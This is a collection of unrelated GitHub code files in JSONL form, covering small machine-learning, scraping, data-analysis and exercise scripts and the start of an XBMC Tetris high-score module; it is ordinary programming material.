{"seq_id":"72695660394","text":"# Import the libraries\nimport numpy as np #linear algebra\nimport pandas as pd #data processing, CSV file I/O\nimport matplotlib.pyplot as plt #plotting graphs\n\n#Sigmoid Function\ndef sigmoid(z):\n    \"\"\"sigmoid function\"\"\"\n    return 1 / (1 + np.exp(-z))\n\n#Cost function\ndef cost(theta, x, y):\n    \"\"\"cost function\"\"\"\n    h = sigmoid(x @ theta)\n    m = len(y)\n    cost = 1 / m * np.sum(\n        -y * np.log(h) - (1 - y) * np.log(1 - h)\n    )\n    grad = 1 / m * ((y - h) @ x) #GRADIENT\n    return cost, grad\n\n#Fitting function\ndef fit(x, y, max_iter=50000, alpha=0.1):\n    \"\"\"logistic classification model\"\"\"\n    x = np.insert(x, 0, 1, axis=1) # x0=1\n    thetas = []\n    classes = np.unique(y) \n    costs = np.zeros(max_iter)\n\n    for c in classes:\n        # one vs. 
rest binary classification\n        binary_y = np.where(y == c, 1, 0) #current class as 1 , rest as 0\n        theta = np.zeros(x.shape[1])\n        for epoch in range(max_iter):\n            costs[epoch], grad = cost(theta, x, binary_y)\n            theta += alpha * grad\n        thetas.append(theta)\n\n    return thetas, classes, costs\n\n#Prediction function\ndef predict(classes, thetas, x):\n    \"\"\"predict class from max h(x) value\"\"\"\n    x = np.insert(x, 0, 1, axis=1) #x0 = 1\n\n    preds = [ np.argmax( [sigmoid(xi @ theta) for theta in thetas] ) for xi in x ]\n    return [classes[p] for p in preds]\n\n#Accuracy Score\ndef score(classes, theta, x, y):\n    \"\"\"calculating the accuracy score\"\"\"\n    return (predict(classes, theta, x) == y).mean() *100\n\n#Data input\niris = pd.read_csv(\"./input/Iris.csv\") #take input\niris = iris.drop(['Id'],axis=1) #removing the id column \n\niris['Species'] = iris['Species'].map({'Iris-setosa':0,'Iris-versicolor':1,'Iris-virginica':2}) \n#assigning integer values to the classes\ndata = np.array(iris)\nnp.random.shuffle(data) #shuffling\n\n#splitting the data in training and testing\nnum_train = int(.7 * len(data)) # 70/30 train/test split\nx_train, y_train = data[:num_train, :-1], data[:num_train, -1]\nx_test, y_test = data[num_train:, :-1], data[num_train:, -1]\n\n#training model with all features\nthetas, classes, costs = fit(x_train, y_train)\n","repo_name":"arrowav36/Iris-Project","sub_path":"Iris.py","file_name":"Iris.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"10614954423","text":"from socket import *\n\n\nwhile True:\n    data = input(\"Me: \")\n    if not data:\n        break\n    sockfd = socket()\n    sockfd.connect(('127.0.0.1', 8088))\n    sockfd.send(data.encode())\n    res = sockfd.recv(1024)\n    print(\"Xiaomei: \" + res.decode())\n    sockfd.close()\n","repo_name":"xiashuo/tedu_execises","sub_path":"month02/day11/tcp_clent.py","file_name":"tcp_clent.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"14824021719","text":"# Owner(s): [\"module: unknown\"]\n\nimport collections\nimport unittest\n\nimport torch\nfrom torch.testing._internal.common_utils import (\n    TestCase, run_tests, TEST_WITH_ASAN)\n\ntry:\n    import psutil\n    HAS_PSUTIL = True\nexcept ImportError:\n    HAS_PSUTIL = False\n\ndevice = torch.device('cpu')\n\n\nclass Network(torch.nn.Module):\n    maxp1 = torch.nn.MaxPool2d(1, 1)\n\n    def forward(self, x):\n        return self.maxp1(x)\n\n\n@unittest.skipIf(not HAS_PSUTIL, \"Requires psutil to run\")\n@unittest.skipIf(TEST_WITH_ASAN, \"Cannot test with ASAN\")\nclass TestOpenMP_ParallelFor(TestCase):\n    batch = 20\n    channels = 1\n    side_dim = 80\n    x = torch.randn([batch, channels, side_dim, side_dim], device=device)\n    model = Network()\n\n    def func(self, runs):\n        p = psutil.Process()\n        # warm up for 5 runs, then things should be stable for the last 5\n        last_rss = collections.deque(maxlen=5)\n        for n in range(10):\n            for i in range(runs):\n                self.model(self.x)\n            last_rss.append(p.memory_info().rss)\n        return last_rss\n\n    def func_rss(self, runs):\n        last_rss = list(self.func(runs))\n        # Check that the sequence is not strictly increasing\n        is_increasing = True\n        for idx in range(len(last_rss)):\n            if idx == 0:\n                continue\n            is_increasing = is_increasing and (last_rss[idx] > last_rss[idx - 1])\n        self.assertTrue(not is_increasing,\n                        msg=f'memory usage is increasing, {str(last_rss)}')\n\n    def test_one_thread(self):\n        \"\"\"Make sure 
there is no memory leak with one thread: issue gh-32284\n \"\"\"\n torch.set_num_threads(1)\n self.func_rss(300)\n\n def test_n_threads(self):\n \"\"\"Make sure there is no memory leak with many threads\n \"\"\"\n ncores = min(5, psutil.cpu_count(logical=False))\n torch.set_num_threads(ncores)\n self.func_rss(300)\n\nif __name__ == '__main__':\n run_tests()\n","repo_name":"pytorch/pytorch","sub_path":"test/test_openmp.py","file_name":"test_openmp.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"3660602326","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime\n\nimport scrapy\n\n\ndef convertstringtofloat(somestring):\n return float(somestring.replace(\",\", \".\"))\n\n\nclass NordnetSpider(scrapy.Spider):\n name = 'nordnet'\n start_urls = ['https://www.nordnet.no/market/stocks?sortField=diff_pct&sortOrder=desc&page=1&exchangeCountry=NO',\n 'https://www.nordnet.no/market/stocks?sortField=diff_pct&sortOrder=desc&page=2&exchangeCountry=NO',\n 'https://www.nordnet.no/market/stocks?sortField=diff_pct&sortOrder=desc&page=3&exchangeCountry=NO']\n\n def parse(self, response):\n for stockline in response.xpath(\"//tbody/tr\"):\n date_today = datetime.today()\n stockname = stockline.xpath(\"td[@data-title='Navn']/a/text()\").get()\n last_price_today = stockline.xpath(\"td[@data-title='Siste']/span/span[@aria-hidden='true']/text()\").get()\n last_price_today = convertstringtofloat(last_price_today)\n highest_price_today = stockline.xpath(\"td[@data-title='Høy']/text()\").get()\n highest_price_today = convertstringtofloat(highest_price_today)\n lowest_price_today = stockline.xpath(\"td[@data-title='Lav']/text()\").get()\n lowest_price_today = convertstringtofloat(lowest_price_today)\n turnover = stockline.xpath(\"td[@data-title='Omsetning']/span/span[@aria-hidden='true']/text()\").get()\n turnover = convertstringtofloat(turnover)\n time_of_day = stockline.xpath(\"td[@data-title='Tid']/span/text()\").get()\n\n yield {\n 'date': date_today,\n 'stockname': stockname,\n 'last_price_today': last_price_today,\n 'highest_price_today': highest_price_today,\n 'lowest_price_today': lowest_price_today,\n 'turnover': turnover,\n 'time_of_day': time_of_day\n }\n","repo_name":"Bragalund/StockPriceGatherer","sub_path":"venv/stockpricescraper/stockpricescraper/spiders/nordnetspider.py","file_name":"nordnetspider.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36974452627","text":"from types import SimpleNamespace\n\nimport numpy as np\nfrom scipy import optimize\n\nimport pandas as pd \nimport matplotlib.pyplot as plt\n\nclass HouseholdSpecializationModelClass:\n def __init__(self):\n \"\"\" setup model \"\"\"\n\n # a. create namespaces\n par = self.par = SimpleNamespace()\n sol = self.sol = SimpleNamespace()\n\n # b. preferences\n par.rho = 2.0\n par.nu = 0.001\n par.epsilon = 1.0\n par.omega = 0.5 \n\n # c. household production\n par.alpha = 0.5\n par.sigma = 1.0\n\n # d. wages\n par.wM = 1.0\n par.wF = 1.0\n par.wF_vec = np.linspace(0.8,1.2,5)\n\n # e. targets\n par.beta0_target = 0.4\n par.beta1_target = -0.1\n\n # f. 
solution\n        sol.LM_vec = np.zeros(par.wF_vec.size)\n        sol.HM_vec = np.zeros(par.wF_vec.size)\n        sol.LF_vec = np.zeros(par.wF_vec.size)\n        sol.HF_vec = np.zeros(par.wF_vec.size)\n\n        sol.beta0 = np.nan\n        sol.beta1 = np.nan\n\n    def calc_utility(self,LM,HM,LF,HF):\n        \"\"\" calculate utility \"\"\"\n\n        par = self.par\n        sol = self.sol\n\n        # a. consumption of market goods\n        C = par.wM*LM + par.wF*LF\n\n        # b. home production\n        if par.sigma == 0:\n            H = np.minimum(HF,HM)\n        elif par.sigma == 1:\n            H = HM**(1-par.alpha)*HF**par.alpha\n        else:\n            H = ((1-par.alpha)*HM**((par.sigma-1)/par.sigma)+par.alpha*HF**((par.sigma-1)/par.sigma))**(par.sigma/(par.sigma-1))\n\n        # c. total consumption utility\n        Q = C**par.omega*H**(1-par.omega)\n        utility = np.fmax(Q,1e-8)**(1-par.rho)/(1-par.rho)\n\n        # d. disutility of work\n        epsilon_ = 1+1/par.epsilon\n        TM = LM+HM\n        TF = LF+HF\n        disutility = par.nu*(TM**epsilon_/epsilon_+TF**epsilon_/epsilon_)\n        \n        return utility - disutility\n\n    def solve_discrete(self,do_print=False):\n        \"\"\" solve model discretely \"\"\"\n        \n        par = self.par\n        sol = self.sol\n        opt = SimpleNamespace()\n        \n        # a. all possible choices\n        x = np.linspace(0,24,49)\n        LM,HM,LF,HF = np.meshgrid(x,x,x,x) # all combinations\n        \n        LM = LM.ravel() # vector\n        HM = HM.ravel()\n        LF = LF.ravel()\n        HF = HF.ravel()\n\n        # b. calculate utility\n        u = self.calc_utility(LM,HM,LF,HF)\n        \n        # c. set to minus infinity if constraint is broken\n        I = (LM+HM > 24) | (LF+HF > 24) # | is \"or\"\n        u[I] = -np.inf\n        \n        # d. find maximizing argument\n        j = np.argmax(u)\n        \n        opt.LM = LM[j]\n        opt.HM = HM[j]\n        opt.LF = LF[j]\n        opt.HF = HF[j]\n\n        # e. print\n        if do_print:\n            for k,v in opt.__dict__.items():\n                print(f'{k} = {v:6.4f}')\n\n        return opt\n\n    def solve(self, do_print=False):\n        \"\"\" solve model continuously \"\"\"\n        par = self.par\n        sol = self.sol\n        opt = SimpleNamespace()\n\n        # setting up the function\n        def obj(x):\n            return -self.calc_utility(x[0], x[1], x[2], x[3])\n        \n        # setting bounds and constraints\n        bounds = optimize.Bounds([0,0,0,0], [24,24,24,24])\n        constraints = optimize.LinearConstraint([[1,1,0,0], [0,0,1,1]], [0,0], [24,24])\n\n        # the optimizer with the function, guess, method, bounds and constraints\n        result = optimize.minimize(obj, (4,5,8,7), method='trust-constr', bounds=bounds, constraints=constraints)\n\n        # Storing the results\n        opt.LM = result.x[0]\n        opt.HM = result.x[1]\n        opt.LF = result.x[2]\n        opt.HF = result.x[3]\n\n        if do_print:\n            for k,v in opt.__dict__.items():\n                print(f'{k} = {v:6.4f}')\n\n        return opt\n    \n    def solve_wF_vec(self,discrete=False):\n        \"\"\" solve model for vector of female wages \"\"\"\n        par = self.par\n        sol = self.sol\n\n        # Looping over wage-ratio and solving model\n        for i,wF in enumerate(par.wF_vec):\n            par.wF = wF\n            # solve discrete model\n            if discrete: \n                opt = self.solve_discrete()\n            else: \n                opt = self.solve()\n\n            # store solution \n            sol.LM_vec[i] = opt.LM\n            sol.HM_vec[i] = opt.HM\n            sol.LF_vec[i] = opt.LF\n            sol.HF_vec[i] = opt.HF\n        \n        return sol\n\n    def run_regression(self):\n        \"\"\" run regression \"\"\"\n\n        par = self.par\n        sol = self.sol\n\n        x = np.log(par.wF_vec)\n        y = np.log(sol.HF_vec/sol.HM_vec)\n        A = np.vstack([np.ones(x.size),x]).T\n        sol.beta0,sol.beta1 = np.linalg.lstsq(A,y,rcond=None)[0]\n    \n    def estimate(self,alpha=None,sigma=None):\n        \"\"\" estimate alpha and sigma \"\"\"\n\n        
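# note: this method is left as a stub ('pass') below in the original code.\n        # A minimal sketch of one possible completion (hypothetical, not the\n        # author's code): choose alpha and sigma so the regression coefficients\n        # from run_regression() match the beta targets set in __init__:\n        #\n        #   par, sol = self.par, self.sol\n        #   def objective(params):\n        #       par.alpha, par.sigma = params\n        #       self.solve_wF_vec()\n        #       self.run_regression()\n        #       return (par.beta0_target - sol.beta0)**2 + (par.beta1_target - sol.beta1)**2\n        #   res = optimize.minimize(objective, x0=[0.5, 1.0], method='Nelder-Mead')\n        #   return res.x\n        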
pass","repo_name":"zds655/projects-2023-zds655","sub_path":"inauguralproject/Inaugural_project.py","file_name":"Inaugural_project.py","file_ext":"py","file_size_in_byte":4798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31609331110","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport json\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torchvision\nfrom torchvision import models\nfrom torchvision import datasets, transforms\nimport numpy as np\nimport time\nfrom collections import defaultdict\nmetrics_dict = defaultdict(list)\ncompression_dict = defaultdict(list)\npercentage_of_layers = 0.4\n\ndef generate_mask_array(array_len):\n num_ones = int(array_len * percentage_of_layers)\n num_zeros = array_len - num_ones\n arr = np.array([1] * num_ones + [0] * num_zeros)\n np.random.shuffle(arr)\n return arr\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, in_planes, planes, stride=1):\n super(BasicBlock, self).__init__()\n num_filter = int(planes/16)\n self.conv1 = nn.ModuleList([\n nn.Conv2d(in_planes, 16, kernel_size=3, stride=stride, padding=1, bias=False) for i in range(num_filter)])\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.ModuleList([\n nn.Conv2d(planes, 16, kernel_size=3, stride=1, padding=1, bias=False) for i in range(num_filter)])\n self.bn2 = nn.BatchNorm2d(planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion*planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion*planes)\n )\n\n def forward(self, x):\n out = [b(x) for b in self.conv1]\n out = torch.cat(out, dim=1)\n out = F.relu(self.bn1(out))\n out = [b(out) for b in self.conv2]\n out = torch.cat(out, dim=1)\n out = self.bn2(out)\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, in_planes, planes, stride=1):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(self.expansion*planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion*planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion*planes)\n )\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = F.relu(self.bn2(self.conv2(out)))\n out = self.bn3(self.conv3(out))\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\nclass ResNet(nn.Module):\n def __init__(self, block, num_blocks, num_classes=10):\n super(ResNet, self).__init__()\n self.in_planes = 64\n\n self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(64)\n self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)\n self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)\n self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)\n self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)\n self.linear = 
nn.Linear(512*block.expansion, num_classes)\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1]*(num_blocks-1)\n layers = []\n for stride in strides:\n layers.append(block(self.in_planes, planes, stride))\n self.in_planes = planes * block.expansion\n return nn.Sequential(*layers)\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = self.layer1(out)\n out = self.layer2(out)\n out = self.layer3(out)\n out = self.layer4(out)\n out = F.avg_pool2d(out, 4)\n out = out.view(out.size(0), -1)\n out = self.linear(out)\n out = F.log_softmax(out, dim=1)\n return out\n\ndef train(model, device, train_loader, optimizer, epoch, criterion):\n global metrics_dict\n model.train()\n step_count = 0\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n # array_mask = generate_mask_array(len(model.conv1_list))\n # for idx,p in enumerate(model.conv1_list):\n # if array_mask[idx] == 0:\n # p.weight.requires_grad = False\n # p.bias.requires_grad = False\n\n # array_mask = generate_mask_array(len(model.conv2_list))\n # for idx, p in enumerate(model.conv2_list):\n # if array_mask[idx] == 0:\n # p.weight.requires_grad = False\n # p.bias.requires_grad = False\n\n step_count += 1\n #if step_count%20==0 or step_count==1:\n if step_count%200==0:\n print (\"Changing the parameter step_count = {}\".format(step_count))\n for child in model.layer1.children():\n array_mask = generate_mask_array(len(child.conv1))\n for idx, p in enumerate(child.conv1):\n if array_mask[idx] == 0:\n p.weight.requires_grad = False\n array_mask = generate_mask_array(len(child.conv2))\n for idx, p in enumerate(child.conv2):\n if array_mask[idx] == 0:\n p.weight.requires_grad = False\n \n for child in model.layer2.children():\n array_mask = generate_mask_array(len(child.conv1))\n for idx, p in enumerate(child.conv1):\n if array_mask[idx] == 0:\n p.weight.requires_grad = False\n array_mask = generate_mask_array(len(child.conv2))\n for idx, p in enumerate(child.conv2):\n if array_mask[idx] == 0:\n p.weight.requires_grad = False\n\n \n for child in model.layer3.children():\n array_mask = generate_mask_array(len(child.conv1))\n for idx, p in enumerate(child.conv1):\n if array_mask[idx] == 0:\n p.weight.requires_grad = False\n array_mask = generate_mask_array(len(child.conv2))\n for idx, p in enumerate(child.conv2):\n if array_mask[idx] == 0:\n p.weight.requires_grad = False\n\n \n for child in model.layer4.children():\n array_mask = generate_mask_array(len(child.conv1))\n for idx, p in enumerate(child.conv1):\n if array_mask[idx] == 0:\n p.weight.requires_grad = False\n array_mask = generate_mask_array(len(child.conv2))\n for idx, p in enumerate(child.conv2):\n if array_mask[idx] == 0:\n p.weight.requires_grad = False\n \n # for param in model.parameters():\n # print (param.requires_grad)\n # import ipdb; ipdb.set_trace()\n optimizer = torch.optim.Adam(filter(lambda p: p.requires_grad,\n model.parameters()), lr=0.01) \n optimizer.zero_grad()\n output = model(data)\n loss = criterion(output, target)\n loss.backward()\n temp_array = np.random.randint(0, high=2, size=10)\n \n # import ipdb; ipdb.set_trace()\n layer_count = 0\n # for param in model.parameters():\n # temp_mod = return_compress(param.grad.data, layer_count)\n # param.grad.data = temp_mod\n # layer_count += 1\n # import ipdb; ipdb.set_trace()\n metrics_dict['loss_value'].append(loss.item())\n optimizer.step()\n if batch_idx % 20 == 0:\n print('Train Epoch: {} [{}/{} 
({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.item()))\n\ndef test(model, device, test_loader):\n global metrics_dict\n model.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss\n pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= len(test_loader.dataset)\n metrics_dict['accuracy'].append(100. * (correct/float(\n len(test_loader.dataset))))\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss, correct, len(test_loader.dataset),\n 100. * correct / len(test_loader.dataset)))\n\ndef main():\n device = \"cuda\"\n criterion = nn.CrossEntropyLoss()\n transform_train = transforms.Compose([\n transforms.Resize(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n])\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n])\n\n trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform_train)\n train_loader = torch.utils.data.DataLoader(trainset, batch_size=128, shuffle=True, num_workers=2)\n\n testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform_test)\n test_loader = torch.utils.data.DataLoader(testset, batch_size=100, shuffle=False, num_workers=2)\n\n # model = ResNet(BasicBlock, [2,2,2,2])\n model = models.resnet18(pretrained=True)\n model.fc = nn.Linear(in_features=512, out_features=10,bias=True)\n model = model.to(device)\n optimizer = None\n for epoch in range(30):\n tic = time.time()\n train(model, device, train_loader, optimizer, epoch, criterion)\n toc = time.time()\n print (\"Time taken for an epoch = {}\".format(toc-tic))\n metrics_dict[\"Time per epoch\"].append(toc-tic)\n test(model, device, test_loader)\n\n \n with open(\"./40pc_change_20_resnet_adam_stats.json\", 'w') as f:\n json.dump(metrics_dict, f, indent=4)\n\nif __name__ == '__main__':\n main()\n","repo_name":"dereklh4/project_744","sub_path":"crazy_resnet.py","file_name":"crazy_resnet.py","file_ext":"py","file_size_in_byte":10763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33692773674","text":"from collections import deque\n\n\nclass Data:\n def __init__(self, node, rtn_func):\n self.node = node\n self.step = 0\n self.left = None\n self.right = None\n self.rtn_func = rtn_func\n\n def set_left(self, value):\n self.left = value\n\n def set_right(self, value):\n self.right = value\n\n def __repr__(self):\n return '%s' % self.node\n\n\ndef _recursion(root, rtn_func):\n stack = deque()\n stack.append(Data(root, lambda x: None))\n rtn = None\n\n while len(stack):\n current = stack.pop()\n node = current.node\n if node is None or current.step > 1:\n rtn = rtn_func(node=node, left=current.left, right=current.right)\n current.rtn_func(rtn)\n elif current.step is 0:\n stack.append(current)\n stack.append(Data(node.left, current.set_left))\n elif current.step is 1:\n stack.append(current)\n stack.append(Data(node.right, current.set_right))\n current.step += 1\n return 
rtn\n\n\ndef recursion(func):\n def wrapper(root):\n return _recursion(root=root, rtn_func=func)\n return wrapper\n","repo_name":"pochangl/leetcode","sub_path":"dsa/tree/binary/traversal.py","file_name":"traversal.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12421205933","text":"import os\r\nimport csv\r\n\r\n# Path to collect data from the Resources folder\r\nbudget_csv = os.path.join ('Resources', 'budget_data.csv')\r\n\r\nmonths = []\r\nprofit = []\r\n\r\n# Read the CSV file\r\nwith open(budget_csv, 'r') as csvfile:\r\n\r\n # Split the data on commas\r\n csvreader = csv.reader(csvfile, delimiter=',')\r\n\r\n header = next(csvreader)\r\n\r\n #loop through each row of the file to get the month and the profits/loss\r\n for row in csvreader:\r\n months.append(row[0])\r\n profit.append(int(row[1])) #convert str with profit into integer so we can calculate things later\r\n\r\n # Total number of months\r\n total_months = len(months)\r\n print(f'Total months: {total_months}')\r\n \r\n # The net total amount of \"Profit/Losses\" over the entire period\r\n total_profit = sum(profit)\r\n print(f'Total profit: ${total_profit}')\r\n\r\n # The changes in \"Profit/Losses\" over the entire period, and then the average of those changes\r\n change = []\r\n month_change = []\r\n i = 1\r\n\r\n # Loop through profits and calculate changes subtracting previous months from current month\r\n for i in range(i,len(profit)):\r\n change.append(profit[i] - profit[i-1])\r\n # Store the months that changes are being computed for\r\n month_change.append(months[i])\r\n \r\n # Calculate average of changes\r\n av_change = sum(change)/len(change)\r\n print(f'Average Change: ${round(av_change,2)}')\r\n\r\n # The greatest increase in profits (date and amount) over the entire period\r\n max_value = max(change)\r\n max_month = month_change[change.index(max_value)]\r\n print(f'Greatest Increase in Profits: {max_month} (${max_value})')\r\n \r\n # The greatest decrease in profits (date and amount) over the entire period\r\n min_value = min(change)\r\n min_month = month_change[change.index(min_value)]\r\n print(f'Greatest Decrease in Profits: {min_month} (${min_value})')\r\n\r\n # Write the text file\r\n output_path = os.path.join ('analysis', 'pybank.txt')\r\n\r\n with open(output_path, 'w') as text:\r\n text.write ('Financial analysis \\n'\r\n '---------------------------------- \\n'\r\n f'Total months: {total_months} \\n'\r\n f'Total profit: ${total_profit} \\n'\r\n f'Average Change: ${round(av_change,2)} \\n'\r\n f'Greatest Increase in Profits: {max_month} (${max_value}) \\n'\r\n f'Greatest Decrease in Profits: {min_month} (${min_value})')","repo_name":"catisf/python-challenge","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10483090619","text":"#!/usr/bin/python3\ndef list_division(my_list_1, my_list_2, list_length):\n place = 0\n length = []\n while place < list_length:\n try:\n res = my_list_1[place] / my_list_2[place]\n except ZeroDivisionError:\n res = 0\n print(\"division by 0\")\n except TypeError:\n res = 0\n print(\"wrong type\")\n except IndexError:\n res = 0\n print(\"out of range\")\n finally:\n place += 1\n length.append(res)\n return 
length\n","repo_name":"MegaChie/alx-higher_level_programming","sub_path":"0x05-python-exceptions/4-list_division.py","file_name":"4-list_division.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3906844838","text":"###################################################################\r\n#\r\n# Tetris v1.0\r\n#\t\tby asteron \r\n#\r\n# This module is pretty much entirely self contained, the interface to it is the showDialog on the gameDialog class\r\n# You do have to load its settings manually though.\r\n###################################################################\r\n\r\n__addonID__ = \"script.game.tetris\"\r\n\r\nimport xbmc,xbmcgui\r\nimport onlinehighscores\r\nimport os, threading, traceback\r\n\r\nSPECIAL_PROFILE_DIR = xbmc.translatePath( \"special://profile/\" )\r\nSPECIAL_SCRIPT_DATA = os.path.join( SPECIAL_PROFILE_DIR, \"addon_data\", __addonID__ )\r\nif not os.path.isdir( SPECIAL_SCRIPT_DATA ): os.makedirs( SPECIAL_SCRIPT_DATA )\r\nTETRIS_SCORES = os.path.join( SPECIAL_SCRIPT_DATA, \"%s_scores.txt\" )\r\n\r\nMAX_SCORE_LENGTH = 10\r\n\r\nACTION_PARENT_DIR\t= 9\r\nACTION_STOP\t\t= 13\r\nACTION_PREVIOUS_MENU\t= 10\r\n\r\nCOORD_720P = 1\r\nCOORD_PAL_4X3 = 6 \r\n\r\n\r\nDO_LOGGING = 0\r\ntry:\r\n\tLOG_FILE.close()\r\nexcept Exception:\r\n\tpass\r\nif DO_LOGGING:\r\n\tLOG_FILE = open(os.getcwd()[:-1]+\"\\\\scorelog.txt\",'w')\r\ndef LOG(message):\r\n\tif DO_LOGGING:\r\n\t\tLOG_FILE.write(str(message)+\"\\n\")\r\n\t\tLOG_FILE.flush()\t\r\ndef LOGCLOSE():\r\n\tif DO_LOGGING:\r\n\t\tLOG_FILE.close()\r\n\t\t\r\ndef unikeyboard(default,header=\"\"):\r\n\t\"\"\"\r\n\t\tOpens XBMC Virtual Keyboard\r\n\t\tGive it the Default value and header and it will return the value entered\r\n\t\tIf user cancelled it will return the default text.\r\n\t\"\"\"\r\n\tkb = xbmc.Keyboard(default,header)\r\n\tkb.doModal()\r\n\twhile (kb.isConfirmed()):\r\n\t\ttext = kb.getText()\r\n\t\tif len(text) > 0:\r\n\t\t\treturn text\r\n\t\tkb.doModal()\r\n\treturn default\r\n\r\n#avoid stretching on different pixel aspect ratios\r\ndef noStretch(window):\r\n\tif window.getResolution() < 2: window.setCoordinateResolution(COORD_720P)\r\n\telse: window.setCoordinateResolution(COORD_PAL_4X3)\r\n\t\r\n# I had problems with onlinehighscores giving exceptions if network unplugged... wrap it up to be safe\r\nclass SafeOnlineHighScores:\r\n\tdef __init__(self):\r\n\t\tself.ohs = onlinehighscores.highscore()\r\n\r\n\tdef get_user_id(self,u,p):\r\n\t\tLOG(\"GUI! - \" + u+'-'+p)\r\n\t\ttry:\r\n\t\t\treturn self.ohs.get_user_id(u,p)\r\n\t\texcept Exception:\r\n\t\t\treturn \"0\"\r\n\tdef create_new_user(self,u,p):\r\n\t\tLOG(\"CNU! -\"+u+\"|\"+p)\r\n\t\ttry:\r\n\t\t\treturn self.ohs.create_new_user(u,p)\r\n\t\texcept Exception:\r\n\t\t\treturn \"0\"\r\n\tdef insert_new_highscore(self,gi,ui,sc):\r\n\t\tLOG(\"INH!\")\r\n\t\ttry:\r\n\t\t\treturn self.ohs.insert_new_highscore(gi,ui,sc)\r\n\t\texcept Exception:\r\n\t\t\ttraceback.print_exc()\r\n\t\t\treturn \"0\"\r\n\tdef get_highscore(self,i):\r\n\t\tLOG(\"GHS - \" + str(i))\r\n\t\ttry:\r\n\t\t\treturn self.ohs.get_highscore(i)\r\n\t\texcept Exception:\r\n\t\t\tLOG(\"GHS error\")\r\n\t\t\ttraceback.print_exc()\r\n\t\t\treturn \"\"\r\n\tdef get_game_id(self,g):\r\n\t\tLOG(\"GGID - \" + g)\r\n\t\ttry:\r\n\t\t\treturn self.ohs.get_game_id(g)\r\n\t\texcept Exception:\r\n\t\t\ttraceback.print_exc()\r\n\t\t\treturn \"0\"\r\n\tdef create_new_game(self,g):\r\n\t\tLOG(\"CNG! 
